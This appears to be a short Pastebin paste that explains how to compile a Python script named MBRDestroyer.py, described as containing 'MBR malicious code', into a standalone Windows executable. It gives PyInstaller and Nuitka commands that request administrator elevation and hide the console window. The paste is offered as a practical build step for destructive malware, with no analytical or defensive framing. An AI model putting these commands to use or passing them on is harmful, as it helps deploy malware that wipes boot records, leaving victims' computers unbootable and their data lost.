Advertisement
FlyFar

buildpy2exe_guide

Mar 28th, 2023
217
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. To build a Python file to EXE (this exe file must be run with admin rights) I will use Pyinstaller or Nuitka to build software containing MBR malicious code:
  2.  
  3. pyinstaller --onefile --uac-admin -w MBRDestroyer.py
  4.  
  5. nuitka --onefile --windows-uac-admin --mingw64 --disable-console MBRDestroyer.py
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement